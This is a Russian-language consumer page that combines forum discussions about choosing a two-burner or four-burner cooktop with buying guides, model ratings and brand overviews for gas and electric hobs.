27 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

2 Или 4 конфорки что лучше

Сибмама — о семье, беременности и детях

2 или 4 конфорки: преимущества и недостатки

Сообщение очи черные » Чт Май 24, 2012 14:58

Сообщение Anna.hair.nsk » Чт Май 24, 2012 15:08

Сообщение Olive » Чт Май 24, 2012 19:07

Сообщение Весенна » Чт Май 24, 2012 22:58

Сообщение Kiti-kat » Чт Май 24, 2012 23:08

Сообщение очи черные » Пт Май 25, 2012 13:09

Olive
Весенна
Старые газовые плиты, даже содержащие 2 комфорки, достаточно вместительные, на них помещаются 2 средних кастрюли — это я знаю, когда-то давно в студенчестве пользовалась. А вот современные встраеваемые микроповерхности — не знаю. Вот и хотела узнать у пользователей эдаким чудом.

Kiti-kat
Обычная (не газовая) поверхность чем хороша — она абсолютно ровная, а у газовых есть такие штуки металические(на которые устанавливают посуду — уж не знаю как они называются), которые возвышаются над поверхностью плиты — и я боюсь, что взгромаздить на них посуду не подходящей величины не получится, не знаю

В любом случае — спасибо за советы, милые дамы!

$Samira$
Т.е. я Вас правильно поняла,что если бы у Вас была возможность выбирать между 2 или 4 комфорками, то Вы бы выбрали 4?

Сообщение kostinamama » Пт Май 25, 2012 13:42

Сообщение zanzara » Пт Май 25, 2012 23:16

Хватает 2х, я довольна! Есть же ещё духовка, и на крайний случай микроволновка. И гости нередко к нам приходят. Торт, салаты и первое можно приготовить заранее, мясо на большой конфорке, гарнир в микроволновке, дополнительный гарнир на маленькой, в духовке — пицца!

Сообщение Весенна » Сб Май 26, 2012 15:29

Сообщение очи черные » Вс Май 27, 2012 11:05

Кстати, разные поверхности имеют разные характеристики. Вот что нашла в отзывах:
о Beko с чугунными решетками:
Достоинства: Компактная, конфорки расположены на достаточном расстоянии, чтобы можно было поставить рядом сковородку и кастрюлю нормальных размеров. Удобно, что есть дополнительные опоры и решетка не эмалированная, то есть посуда никуда не соскальзывает. Электроподжиг схватывает быстро, при желании им можно не пользоваться, а использовать обычные спички и т.д., как я, так как на даче рядом с местом встраивания не было разетки
Недостатки: Поверхность из нержавейки, для меня это недостаток, т.к. Сложно отмывать. Эмаль и стекло в этом плане лучше
Комментарий: Я довольна, всем советую. Приятно, что в комплекте оказалась решетка для кофейника.

о Electrolux:
Достоинства: Изготовлена качественно — из довольно толстого листа нержавейки (если сравнить с аналогичной zanussi или самой дешевой от бош — там от нажатия пальцем на поверхность тонкий метал прогибается).
Решетка выполнена из чугуна, потому не облезет как эмаль.
Крутилки мягкие, легко поворачиваются, для меня это плюс, а вот для детей это скорее минус.
Недостатки: Большой минус Electrolux за такое неудачное малое расстояние между горелками.
Комментарий: Купил, не почитав отзывов. Есть такое, неприятное ощущение, вроде горелки 2, а готовить с комфортом не получается из-за расстояния.
Лучше выбрать Hotpoint-Ariston 7HDZ20S(IX)RU — она и стоит дешевле и расстояние приличное между горелками или Hotpoint-Ariston DZ 20 GH.

Zanussi , Bosch
Хотели сэкономить рабочее пространство, но в итоге каждый день жалею что ее купили. Расстояние между конфорками очень маленькое, кастрюлю примерно на 2 литра и сковородку 24 см. одновременно не поставить, приходиться посуду смещать к краям плиты и она уже чуть ли не падает и спереди нависает над ручками, от чего они нагреваются. С тем же успехом можно взять одноконфорочную плиту. Эта плита рассчитана на 2 маленькие кастрюльки. Собираемся ее менять на 4-х конфорочную нормальную панель.

стеклокерамика — 2 или 4 конфорки?

Подбирая «апгрейд» кухни озадачился мыслью — отчего массовое распространение получили 4-х конфорочные поверхности?

Сейчас у меня эл. плита с 3 комфорками (мэйд ин СССР), но в 95% случаев одновременно задействованы максимум 2. 3-я конфорка чаще всего используется как подставка для горячих посудин.

Вот я и подумал, почему бы не взять 2-х конфорочную панель?

Вроде, и плюсы солидные есть — экономия места на рабочей поверхности (у меня не сильно большая кухня), экономия денег. Но в душе затаилось отношение к 2-х комфорочникам как ко 2-му сорту, что ли. Бюджетный вариант (от которого я себя одергиваю мыслью, мол, мы не настолько богаты, чтобы покупать дешевые вещи. )

Было бы интересно узнать мнения и опыт форумчан.
Спасибо.

на старой квартире была «Горение» на 3 конфорки
третьей пользовались крайне редко, и если бы ее не было и то обошлись бы без

новую варку (стеклокерамика) купили на 4
зачем сам не знаю, просто взяли и купили, место есть
да и двуконфорочные не сильно дешевле

но если бы места было мало купли бы на 2

Aron написал :
Вот я и подумал, почему бы не взять 2-х конфорочную панель?

  • добавлю: вместо второй части поставить например панель «гриль»?

2BV Хорошая идея.

Do Home Yourself написал :
да и двуконфорочные не сильно дешевле

это, как посмотреть.

В магазине, где я обычно техникой отовариваюсь, например, Gorenje 350 (2-х комфорочная) стоит 7,5 т.руб., тогда как 620-я модель (4-х конфорочная) — 16,5 т.руб.

Конечно, можно найти Занусю 4-х конфорочную за 8 тысяч. но я как-то ориентировался если не на «старшие» модели, то на «средние».

Насчет панели «гриль» я не знаю. Вроде как для этого дела духовка есть 🙂

Да, в теме речь о электрических двух.

А что про газовые — ? Может есть какие-то соображения, которые мне в голову не пришли?

Если говорить про стеклокерамику, то у 4-х конфорочных плит больше выбор возможных диаметров посуды. Конечно, больше 2-х конфорок одновременно редко используется (поди ещё всю посуду на плиту умести), но удобство использования 4-х конфорочных плит значительно больше. Например, для 2-х конфорочной плиты надо куда-то девать горячие кастрюли-сковородки с плиты, чтобы поставить следующие.

Andy_T написал :
то у 4-х конфорочных плит больше выбор возможных диаметров посуды.

Хм, наверно есть двух с расширяемой зоной.

Andy_T написал :
надо куда-то девать горячие кастрюли-сковородки с плиты,

Фартук нержавеющей мойки? Просто подставки?

bv написал :
Хм, наверно есть двух с расширяемой зоной.

bv написал :
Фартук нержавеющей мойки? Просто подставки?

Несомненно. Просто место посуда всё равно съест. Лично мне больше нравится задвинуть
кастрюлю с неиспользуемый в данную минуту угол плиты.

Andy_T написал :
задвинуть

. неправильное слово для стеклокерамики, переставить — больше подходит
Значит надо искать две конфорки 60*60

BV написал :
для стеклокерамики, переставить — больше подходит

А я двигаю — скользит нормально.

2ВТБ!
Двигайте дальше
Любая песчинка — и получаете качественную царапину, которая потом, при неудачном стечении обстоятельств может стать началом трещины.

PS Может вы еще с неё и случайно пролитое сладкое не удаляете?

Есть трех комфорочные панели.

2Dmitriy_840 Не дешевые похоже.

Но есть.

На семейство из четырех человек вполне достаточно 2х конфорочной панели (двумя дальними зонами не пользуемся вообще — нет необходимости)

in my humble opinion

Dmitriy_840 написал :
Но есть.

Они стоят как 4х конфорочные. Видел такую у Аристон — третья зона явно рассчитана на гигантскую утварь общепита

in my humble opinion

Kvost написал :
третья зона явно рассчитана на гигантскую утварь общепита

Воду в ведре греть, когда отключат

2Kvost Ну да, болшая комфока.

У упомянутой ранее Gorenje 350 одна из конфорок — расширяемая, т.о. получаем все самые ходовые размеры — 12, 14 и 18 см.

Если кому ведра нагревать (при отключении горячей воды), то я это делаю обычным кипятильником, вполне шустро получается.

Про использование плиты в качестве подставки для горячей посуды. не глупо ли покупать «подстаку» за несколько тысяч рублей, тогда как можно несколько обычных подставок за несколько десятков рублей. Место все-равно будет занято, но цена. 🙂

BV написал :
Может вы еще с неё и случайно пролитое сладкое не удаляете?

Удаляю, однако. И даже не только сладкое.

Видимых царапин нет, а вот полировка местами нарушена — грешу именно на сахар.

В принципе, всё зависит от количества народа в семье и пищевых обычаев
У меня супруга изредка умудряется все 4 конфорки загрузить.

Себе в идеале я бы вообще взял 4-х конфорочную плиту шириной 80 см( 60 всё-таки узковато).

Но мы любим поесть много и вкусно

Интересно бы узнать мнение пользователей 2-х конфорочных панелей.

2ВТБ!
Лучше всё-таки не иметь привычку двигать — попадётся песчинка, например от салата и .

Три года пользовался 2х конфорочной, но жил один. Сейчас втроем. Много не мало. 4 — оптимум.

ao написал :
Три года пользовался 2х конфорочной, но жил один. Сейчас втроем.

Ура! Человек с опытом юзанья 2-х конфорочной плиты.

Отчего все-таки для троих не стало хватать 2-х конфорок? Конкретно.

Я, честно говоря, совсем никак не связываю количество народа в семье с количеством конфорок. Раньше я был с родителями и братом (т.е. 4 человека), сейчас только с женой (2 человека) и существенной разницы в занятости конфорок не заметил. Разница есть в количестве пищи в кастрюле (на сковороде) или в размерах кастрюль (сковородок).

Более того, не стоит забывать, что на кухне есть еще другие приборы, которые дополняют «ассортимент» плиточного хозяйства — духовка, микроволновка.

Плюс, вариант одновременного включения всех 4-х конфорок я вообще вряд ли могу допустить, т.к. дома у нас по больше части старые, т.е. по мощности может не выдержать (проводка в первую очередь).

Как выбрать варочную панель: помогаем определиться с критериями

Оглавление

Варочная панель — бытовой прибор, с выбором которого неизбежно придется столкнуться каждому, кто отказался от покупки отдельно стоящей кухонной плиты. Причин для такого решения может быть несколько. Например, некоторым может быть вовсе не нужна духовка — зачем тратить лишние деньги и драгоценное место на кухне? Другие хотят сэкономить место на рабочей поверхности за счет уменьшения числа конфорок. Третьи, наоборот, собираются готовить много и часто и предпочитают быть уверенными в том, что на панели всегда найдется место для дополнительной кастрюли… Да и вообще, выбор двух отдельных приборов (духовка плюс варочная панель) вместо одного совмещенного (плита) — это всегда дополнительная возможность убедиться, что вы купите именно то, что вам нужно. Как же выбрать варочную панель и на какие особенности этого бытового прибора нужно обратить внимание в первую очередь? Давайте разберемся.

Газ или электричество

Безусловно, первое, с чем придется определиться при выборе варочной панели — это ее тип. Панели бывают газовые, электрические либо комбинированные — имеющие как газовые, так и электрические конфорки.

В большинстве случаев выбор оказывается очевиден: при наличии газопровода обычно предпочитают газовую панель, при его отсутствии — электрическую. Комбинированные панели чаще всего можно встретить там, где возможны перебои с подачей газа или электричества.

Встраиваемая газовая поверхность Smeg PV675CNX с увеличенной конфоркой по центру

Стоит отметить, что газовые варочные панели нередко комплектуются сменными форсунками для переоборудования под баллонный газ. Ну а если их нет в комплекте, то в некоторых случаях такие форсунки можно приобрести отдельно, обратившись в сервисный центр. Так или иначе, если панель приобретается, например, для дачи, где активно используются газовые баллоны, на этот нюанс нужно обратить внимание заранее.

Электрические варочные панели, в свою очередь, можно разделить на те, в которых используются конфорки с традиционным нагревом, и индукционные — нагревающие непосредственно посуду, а не конфорку. У каждого из этих вариантов есть свои плюсы и минусы.

Газовые варочные панели окажутся в среднем дешевле. Они позволят мгновенно начать либо остановить процесс нагрева. Регулировка интенсивности горения газа позволит быстро и просто отрегулировать мощность конфорки и визуально контролировать процесс приготовления еды. Минусы тут также очевидны: наличие открытого пламени, не слишком высокий КПД (панель в процессе работы будет нагревать воздух в помещении), а также чуть более сложный уход.

Электрические панели с чугунными нагревательными элементами сегодня можно встретить разве что на дачах или в бытовках. В квартирах обычно используются модели с обычными спиральными тэнами, закрытыми стеклокерамикой. Такая панель оказывается плоской, а следовательно, мест, где может скопиться грязь, почти нет.

Варочную поверхность с открытым нагревательным элементом сегодня можно встретить разве что на даче

Такие панели окажутся чуть дороже газовых. Они просты в уходе и позволяют быстро нагреть посуду до нужной температуры. Правда, остановить нагрев мгновенно не получится, поэтому к особенностям панели придется привыкать в течение какое-то времени. При монтаже такой панели, возможно, потребуется подведение дополнительного электрического кабеля высокой мощности.

Индукционные электрические панели отличаются от традиционных тем, что тепло от нагревательного элемента передается непосредственно дну посуды, а не стеклокерамической поверхности. Такие панели имеют наилучший КПД, но потребуют наличия посуды с плоским дном, сделанной из магнитного металла (впрочем, допускается использование специальных металлических «блинов»-прокладок).

При выборе индукционной панели стоит обратить особое внимание на размер нагревательного элемента. Дело в том, что он может оказаться меньше, чем зона, нарисованная на стеклокерамическом покрытии. А это, в свою очередь, может привести к деформации посуды, рассчитанной на работу на высоких температурах: если у большой сковороды будет нагреваться лишь центральная часть, то это не пойдет на пользу ни равномерности прожарки продуктов, ни самой сковороде. Из плюсов индукционных панелей также стоит отметить тот факт, что такой нагревательный элемент не сможет работать без установленной посуды. А следовательно, забыть выключить плиту попросту не получится. Да и убежавшее молоко на индукционной панели не пригорит — ведь нагревается не стеклокерамика, а непосредственно посуда. А вот обычная стеклокерамика не только сильно нагревается, но и долго остывает, так что горячую поверхность можно по ошибке перепутать с холодной.

Комбинированные панели типа Maunfeld MEHS.64.98 S позволят готовить и на газу, и на электричестве

При выборе электрической панели стоит также обратить внимание на тип нагревательного элемента. Они делятся на рапидные, галогеновые и конфорки Hi-Light. Рапидные конфорки — самые простые и дешевые из тех, что можно встретить в варочной панели из стеклокерамики. По сути они представляют собой нагревательную спираль, которая выделяет тепло при подаче электричества. Такие конфорки нагреваются существенно быстрее, чем устаревшие «блины». Галогеновые конфорки считаются более эффективными, поскольку помимо нагревательной спирали они имеют мощную галогеновую лампу, которая светится, выделяя большое количество тепла. В Hi-Light-конфорках разогрев происходит еще эффективнее, чем в галогеновых — в них используется нагреватель ленточного типа.

Габариты панели, число конфорок и их тип

Второй очевидный параметр, который сразу бросается в глаза — это габариты варочной панели. Подавляющее большинство современных моделей подходят для встраивания в стандартные столешницы с глубиной 60 сантиметров. А вот ширина панели может различаться довольно существенно: она зависит от числа конфорок, число которых для бытовых моделей может варьироваться от 1 до 7. Стандарт — 4 конфорки и 60 сантиметров ширины. Желающие сэкономить место обычно выбирают вариант с двумя конфорками (ширина — до 30 см). Те, кто собирается активно готовить и хочет получить больше конфорок, выбирают варианты с 5 или 6 конфорками, что вызовет увеличение ширины панели до 70-90 см. На этом этапе не помешает подумать о покупке вытяжки подходящего размера: если ширина панели превышает 60 см, то и вытяжку лучше выбрать не стандартную, а увеличенную.

Одна конфорка (как у панели VG-415) — решение для любителей минимализма. На этой площади легко поместится две конфорки

Перед тем, как выбрать независимую варочную панель или встроенную модель, стоит подумать и о стандартных сценариях использования прибора. Наиболее популярным запросом является наличие большой двух- или трехконтурной конфорки, при использовании которой возможен выбор площади нагрева в соответствии с диаметром посуды. Из газовых моделей популярностью пользуются конфорки с двойным или тройным рядом пламени, что позволяет добиться быстрого и равномерного нагрева и незаменимо для ситуаций, когда требуется быстрая обработка продуктов на высокой температуре. Наличие овальной зоны нагрева подходит для любителей готовить в посуде удлиненной формы (утятницы, ладки и т. п.). У некоторых моделей существуют конфорки с повышенной мощностью либо специальные wok-конфорки для готовки в круглой глубокой сковороде вогнутой формы или казане. Если позволяют финансы — берите поверхность с одной мощной конфоркой (электрической повышенной мощности или газовой с двойным пламенем). Все остальные изыски — только если вы в самом деле понимаете, зачем вам это нужно.

Стоит отметить, что в настоящее время производители активно экспериментируют с различными решениями, позволяющими расширить функциональность конфорок. Можно встретить индукционные конфорки, автоматически подстраивающиеся под размер установленной посуды, и даже варочные панели, состоящие из одной большой конфорки (посуду на нее можно ставить в произвольном месте), вроде Miele KM 6395 FlexTouch. Некоторые варочные панели могут объединять две стандартные конфорки в одну большую (Gorenje IS 677 USC).

Поверхность панели и внешний вид

От того, какие материалы применяются при изготовлении варочной панели, зависит не только ее внешний вид, но и удобство при уходе: ведь даже при самой аккуратной эксплуатации поверхность придется время от времени очищать от загрязнений и брызг.

Самым бюджетным покрытием считается обычная эмаль. Она требует бережного ухода, поскольку ее легко поцарапать или сколоть. Зато эмалевые поверхности могут быть разного цвета.

Более надежным и практичным (но при этом недорогим) решением является покрытие из нержавеющей стали. Ее сложнее повредить, но на такой поверхности будут лучше заметны следы загрязнений и даже обычные отпечатки пальцев.

Панель Siemens EX675LXC1E позволит ставить посуду в любое место зоны приготовления

Наиболее просты в уходе окажутся модели, выполненные из закаленного стекла. Они же будут выглядеть наиболее стильно и без проблем впишутся в дизайн любой кухни. Стеклокерамика быстро нагревается и быстро остывает. Границы нагрева четко ограничены, за пределами нагреваемой зоны поверхность варочной панели остается холодной. Электрические варочные панели из стеклокерамики довольно экономичны, основное их слабое место — повышенная хрупкость. Ронять тяжелые предметы на них точно не стоит, но даже небольшие точечные удары (при падении не слишком тяжелого, но острого предмета) могут стать причиной скола. Также нужно следить за тем, чтобы на горячую поверхность не попала холодная вода. Дно используемой посуды должно быть идеально ровным, а его диаметр не должен превышать диаметр зоны нагрева.

Стеклокерамическая панель Siemens ET875LMP1D с расширяемой зоной нагрева позволяет использовать посуду разной формы

Стеклокерамические покрытия могут быть выполнены в разных цветовых решениях. К тому же на них часто наносятся надписи и пиктограммы, упрощающие использование панели. В общем, для дизайнера тут нет никаких ограничений.

Варочные панели могут быть обрамлены металлическим профилем (рамкой) или иметь скошенные края. Обрамленные панели окажутся несколько сложнее в уходе — с них будет сложнее смахнуть крошки, а в щели неизбежно попадет жир и грязь. С другой стороны, такая рамка не даст жидкости стечь на пол или на столешницу.

Управление и дополнительные функции

Переключатели для управления конфорками могут быть механическими поворотными либо электронными. В недорогих варочных панелях обычно устанавливаются поворотные переключатели — обычные вращающиеся рукоятки. Именно их можно почти всегда встретить у газовых панелей. Утапливаемые переключатели защищают панель от случайного включения (ими можно воспользоваться лишь в выдвинутом состоянии).

Электронные (в частности — сенсорные) переключатели открывают дополнительные возможности и доступ к расширенным функциям (у таких панелей нередко бывают цифровые дисплеи и/или светодиодные индикаторы).

У газовых панелей расширенных функций практически не бывает. Единственное, что стоит тут упомянуть — наличие электрического поджига (автоматического или полуавтоматического, срабатывающего при нажатии на специальную кнопку), а также систему газ-контроля, отключающую подачу газа в случае, если огонь по какой-то причине погас.

Что же касается электрических панелей, то тут дополнительные возможности окажутся куда шире. Мы перечислим наиболее популярные функции, однако не будем претендовать на полноту этого списка.

  • Таймер каждой конфорки — позволит задать время включения (или, наоборот, время отключения) каждой из конфорок.
  • Индикатор остаточного тепла — специальный светодиод предупредит о том, что конфорка не успела остыть и об нее можно случайно обжечься.
  • Автоотключение при перегреве — название говорит само за себя.
  • Автоматика закипания — функция, доводящая содержимое посуды до кипения на максимальной мощности, после чего уменьшающая нагрев.
  • Многочисленные автопрограммы — позволят приготовить несложные блюда или выбрать подходящий температурный режим автоматически (иногда панель даже позволит вам внести в память собственную программу).
  • Защита от детей — функция блокировки кнопок.
  • Кратковременная пауза — перевод всех конфорок во временный режим поддержания тепла (даст повару время заглянуть в книгу рецептов или протереть поверхность от загрязнения).

Дизайнерские решения (например, Franke FHNE COR 4 3G) могут выглядеть весьма неожиданно

Говоря об управлении, не будет лишним вспомнить и о так называемых «зависимых» панелях. Они продаются в комплекте с духовым шкафом и имеют с ним одну систему управления, которая обычно располагается на передней панели духовки. Такое решение позволяет купить два прибора, выполненных в едином дизайне. Да и обойдется такая «двойная» покупка чуть дешевле. Но зато в случае поломки из строя выйдут сразу оба прибора. Бо́льшая часть имеющихся в продаже варочных панелей — независимые модели. У них своя система управления, их работоспособность не зависит от других кухонных устройств.

Выводы

Подводя итог сказанному выше, несложно определиться с последовательностью принятия решений, которые придется принять при выборе варочной панели.

В начале нужно ответить на базовые вопросы: собираетесь ли вы использовать газ или электричество (а может — и то, и другое), предпочитаете ли встраиваемую или независимую модель, какой тип управления предпочитаете. Второй пункт — подсчет числа необходимых конфорок и принятие решения о необходимости наличия конфорок нестандартных — например, для сковороды-вока. Затем стоит определиться с материалами. На этой же стадии автоматически решится вопрос дизайна — ведь именно от материала поверхности зависит, впишется ли выбранная варочная панель в ваш кухонный гарнитур или нет.

Наконец, дело за малым. Осталось выбрать производителя (в соответствии с собственными представлениями о достоинствах и недостатках тех или иных брендов) и конкретную модель. Ну и, конечно, перед покупкой не помешает проконсультироваться у специалиста — как минимум, чтобы убедиться, что вы ничего не упустили.

Выбираем двухконфорочную газовую плиту с умом: все самое главное, что нужно знать

Чтобы грамотно организовать зону приготовления пищи при нехватке полезного пространства на кухне, потребитель решается на установку компактной газовой плиты с двумя конфорками. О том, какие современные двухконфорочные газовые плиты достойны внимания, и на какие параметры следует обращать первоочередное внимание при выборе модели, будет рассказано в этой публикации.

Особенности газовых варочных панелей на 2 конфорки

Классическая современная газовая плита на две конфорки представляет собой полнофункциональное устройство, обладающее всеми возможностями «старших» моделей. Они могут оснащаться электророзжигом с ручным или автоматическим запуском, системой газ-контроля, таймером, возможностью установки ручек управления в фиксированного положения «малое пламя» и пр. Различают два конструктивных решения варочных панелей:

Первые выполнены в одном корпусе вместе с духовым шкафом и имеют общую панель управления. Вторые могут устанавливаться отдельно от духовки. Каждое устройство в независимом комплекте автономно и имеет свой блок управления. Дизайн варочной панели, как правило, выполнен в стиле «Домино», что дает возможность различной установки прибора, создавать комбинацию из двух панелей (например, газовой и электрической) с установкой их параллельно друг другу или буквой «Г».

В эксплуатации двухконфорочным газовым плитам свойственны те же проблемы, которым подвержены «взрослые» модели: выжигание кислорода в помещении, появление запахов, которые устраняются грамотно организованной системой вентиляции и установкой кухонной вытяжки.

Важно! При установке и использовании кухонного вытяжного зонта важно организовать необходимый объем приточного воздуха из атмосферы. При работе вытяжка создает разряжение в помещении, которое может негативно влиять на работу автономной системы отопления, подтягивать неприятные запахи из вытяжного отверстия санузла и пр.

Виды двухконфорочных газовых плит

Делая свой выбор в сторону двухконфорочной газовой плиты, следует определиться с вариантом размещения устройства. Отечественному потребителю доступны настольные, напольные и встраиваемые модели.

Настольные

Могут быть зависимыми и независимыми. Первые представляют собой духовой шкаф, в верхней части которого установлена варочная панель. Такое конструктивное решение не нашло у отечественного потребителя большой поддержки, так как требует установки на специальную подставку. При настольном монтаже устройство занимает достаточно много места, а варочная панель находится весьма высоко, что неудобно при эксплуатации.

Независимые плиты, напротив, занимают мало места и могут быть установлены на любой горизонтальной поверхности, отвечающей правилам технической и пожарной безопасности. Такие модели очень популярны среди дачников и владельцев загородных домов сезонного проживания.

Напольные

Данный тип газовых плит имеет моноблочное исполнение: варочная поверхность и духовка в одном корпусе. В целях экономии места, производители предусмотрели в большинстве изделий ящик для хранения посуды или хозяйственных принадлежностей. Как правило, недостаток зон приготовления компенсируется внушительным функционалом и широкими возможностями напольного устройства.

Встраиваемые

Такое изделие представляет собой компактную варочную панель с органами управления, которая может устанавливаться непосредственно в столешницу. Встраиваемая техника удобна и функциональна, а при необходимости всегда может быть дополнена духовым шкафом.

Преимущества и недостатки

Как и любая техника, плиты с двумя конфорками имеют свои плюсы и минусы.

  1. Компактность;
  2. Простота установки и транспортировки;
  3. Низкие эксплуатационные расходы;
  4. Сравнительно невысокая стоимость.
  1. Не подходят для больших семей;
  2. Многие модели не оснащены ящиком для посуды.

Основные критерии выбора

Как показала практика, основные требования большинства потребителей данной продукции сводятся к надежности, долговечности и функциональности техники. Чтобы выбрать для себя лучшую модель двухконфорочной газовой плиты, нужно знать, на какие моменты и параметры следует обращать внимание.

Материал варочной поверхности

При производстве варочных панелей может использоваться:

  1. Эмалированная сталь. Эмалевое покрытие недорого, эстетично и неплохо защищает металл от коррозии. Из недостатков можно отметить низкую стойкость к механическим повреждениям. При ударе на эмали легко появляются сколы, при использовании абразивных чистящих средств — царапины;
  2. Нержавеющая сталь. Поверхность из нержавейки отлично смотрится, имеет высокие прочностные показатели, отличается стойкостью к механическим повреждениям и агрессивному воздействию моющих средств;
  3. Закаленное стекло. Варочная поверхность из закаленного стекла имеет современный дизайн, высокую прочность, стойкость к ударам и перепадам температуры. Недостаток: сложность в обслуживании. Для чистки загрязнений следует использовать специальные щадящие средства.

Материал решеток

Тут выбор невелик. Для поддержки посуды используются стальные и чугунные решетки. Чугун выдерживает большую нагрузку и не деформируется при нагреве, чего не скажешь о стальных изделиях. Именно поэтому стальные решетки чаще всего используются в бюджетных моделях, чугунные — в технике среднего и премиального ценового сегмента.

Управление

Контроль работы в двухконфорочных плитах может быть реализован двумя способами:

Механическое управление осуществляется при помощи поворотных ручек. Характеризуется простотой реализации, доступной стоимостью, низкой точностью настройки температуры температурного режима.

Электронное управление осуществляется при помощи сенсорной панели, которая расположена на лицевой части плиты. Характеризуется точностью настроек, возможностью управления различными функциями и предустановленными программами.

Габариты

Настольные газовые плиты с двумя конфорками независимого типа достаточно компактны и не занимают много места на поверхности стола. В зависимости от конструкции, размер такой модели варьируется в пределах 50-60 см в длину и 30-40 см в ширину. Напольная техника несколько крупнее моделей настольного расположения: высота — 85 см, глубина 50-60 см, ширина варьируется от 30 до 90 см. Встраиваемая техника считается самой экономной в плане занимаемого пространства. Габариты самых миниатюрных моделей: 29×51 см, самых больших — 32×53 см.

Газ-контроль

Данная опция блокирует подачу голубого топлива на горелки в случае его утечки или возникновения аварийной ситуации. Функция газ-контроль одна из самых необходимых для обеспечения безопасности при эксплуатации прибора.

Дополнительные функции

Бюджетные модели, как правило, не отличаются богатым функционалом. В лучшем случае, доступная по стоимость печь будет оснащена:

  • электроподжигом, позволяющим зажигать горелки нажатием одной кнопки;
  • функцией газ-контроль, обеспечивающей безопасность при пользовании устройством;
  • опцией блокировки подачи газа одним нажатием;
  • ящиком для хозяйственных принадлежностей.

Современные газовые двухконфорочные плиты с электронным управлением, помимо обозначенных опций, могут оснащаться:

  • программируемым таймером на каждую горелку;
  • функцией интенсивный нагрев или экспресс-конфоркой;
  • режимом «малое пламя»;
  • возможностью самодиагностики.

Рейтинг лучших двухконфорочных газовых плит и панелей

Правильно выбрать оптимальную двухконфорочную газовую плиту поможет рейтинг, составленный на основе пользовательских отзывов.

Бюджетные модели

Одна из самых недорогих настольных моделей независимого типа, характеризующаяся пользователями исключительно с положительной стороны. Рабочая поверхность стальная с покрытием термостойкой эмалью. Плита оснащена двумя чугунными конфорками одинакового размера с механическим управлением. Габаритные размеры (ШхГхВ): 50×37,4×11 см. Особенностью GEFEST 700-02 является возможность подключения к бытовым газовым баллонам, что очень пригодится владельцам дач и загородных домов, находящихся вдали от газовой магистрали. Стоимость находится в пределах от 1380 до 1890 руб.

  1. Экономичность;
  2. Компактность;
  3. Небольшой вес;
  4. Хорошее качество сборки;
  5. Плавная регулировка интенсивности горения.

Недостатком считается отсутствие электроподжига.

Надежная и качественная настольная варочная панель отечественного оборонного завода. Корпус устройства стальной с эмалевым покрытием. Оснащение: две конфорки из нержавеющей стали. Управление механическое поворотными рукоятками, расположенными на лицевой части плиты. Габаритные размеры (ШхГхВ): 50×28,5×11,5см. Особенностью плиты является возможность подключения к баллонам со сжиженным газом. Вес — 3.5 кг. Средняя стоимость варьируется от 1500 до 2000 руб.

  1. Небольшой вес;
  2. Практичность покрытия;
  3. Надежность работы в различных условиях эксплуатации.
  1. Нет пьезорозжига;
  2. Отсутствует «газ-контроль».

Очень популярная компактная газовая варочная панель с двумя конфорками настольного размещения, которая идеально подойдет для использования в малогабаритной квартире, на даче, при вылазках на природу. Оснащение: две газовые конфорки с механическим управлением поворотными переключателями. Рабочая поверхность изготовлена из стали с эмалевым покрытием. Габаритные размеры (ШхГхВ): 50×33×11,2 см. Вес — 3,7 кг. Средняя стоимость варьируется от 1518 до 2450 руб.

  1. Небольшой вес;
  2. Практичность покрытия;
  3. Доступная стоимость.

Недостатком считается отсутствие функций, обеспечивающих безопасность эксплуатации.

Лучшие газовые варочные панели: ТОП-20 моделей, рейтинг, технические характеристики, плюсы и минусы, отзывы покупателей

Кухонная техника сейчас претерпевает изменения, производители оснащают варочные встраиваемые панели разнообразными функциями, чтобы удовлетворить потребности клиентов.

Выбрать из множества моделей газовых панелей бывает сложно.

Чтобы грамотно подобрать для своей кухни панель, следует знать особенности эксплуатации и популярные виды данных приборов, а также их плюсы и минусы.

Популярные бренды-производители

Здесь мы поговорим о ТОП-5 лучших производителей газовых панелей.

Indesit

Итальянский бренд, производящий бытовую технику для ванны и кухни. Начало работы было положено в 1975 году. Модели от Indesit оснащены множеством дополнительных функций, стильным дизайном.

Техника подразделяется на несколько видов — индукционная, газовая и электрическая. Модели встраиваемых панелей настолько разнообразны, что подойдут для любого современного интерьера.

Gefest

Производитель из Бреста, производит качественную бытовую технику. Отличается хорошими материалами, несколькими линейками варочных панелей и плит. Отвечает всем запросам взыскательных клиентов.

Агрегаты данного бренда функциональны, имеют различный ценовой сегмент от бюджетных моделей до дорогостоящих.

Fornelli

Бренд Fornelli выпускается в Италии по европейским стандартам. Происходит из города Молизе. В Россию его привезли в 2008 году, модели варочных панелей пришлись по вкусу требовательным клиентам.

Weissgauff

Немецкая компания, производящая бытовую технику. Техника служит долгие годы, а качество сборки приятно удивит клиентов. Бренд в России сравнительно недавно, но уже имеет своих поклонников. Модели имеют лаконичный дизайн и удобное управление.

Ariston

Американская компания давно славится своими качественными агрегатами для кухни и ванной. Известный повар Джейми Оливер все чаще рекламирует технику Ariston в своем блоге и на своей кулинарной студии.

Техника отличается утонченным стилем, подходящим под современный интерьер. Производитель оснащает модели множеством полезных опций для облегчения жизни клиента.

Это и наличие газового контроля, и электронное управление, которое определеяет уровень мощности с точностью до градуса, и высококачественные материалы и многофункциональный таймер, имеющий три режима.

Модели фирмы направлены на качественное приготовление блюд и сохранение их полезных свойств.

Что лучше – электрическая или газовая варочная панель?

Какой принцип нагрева выбрать, чтобы не прогадать, с таким вопросом приходит в магазин каждый посетитель. Желая приобрести подходящий агрегат, следует сравнить электрические и газовые панели.

Газовая

Нагрев происходит посредством газа при разжигание конфорок. Огонь обеспечивает равномерный нагрев посуды и качественное приготовление блюд. Также, использовать можно любую посуду, почти без ограничений.

Есть ряд преимуществ:

  • Нагреваются быстрее, чем электрические агрегаты;
  • Стоимость приборов ниже;
  • Простое управление;
  • Удобное использование в повседневной жизни;
  • Есть экспресс-конфорки;
  • Более разнообразный дизайн, если поверхность из эмали. Возможность подобрать кремовые оттенки или интересные цвета, как голубой или мятный.

Электрическая

Клиенты покупают в дом электроплиту, заменяя газовое оборудование.

Электроприборы имеют привлекательный внешний вид и безопасность. Обладают большим набором функций. Встраивается в дом с мощной и качественной электропроводкой, иначе есть риск возгорания, если домашняя сеть не справляется с нагрузкой.

Плюсы такой техники:

  • Высокая безопасность;
  • Экологичные материалы, воздух не загрязняется продуктами горения;
  • Многофункциональность панелей;

Но есть и минусы панелей:

  • Высокая цена;
  • Стоимость счетов по электроэнергии гораздо выше;
  • Долго нагревается;
  • Температуру сложно регулировать, если клиент не приноровился.

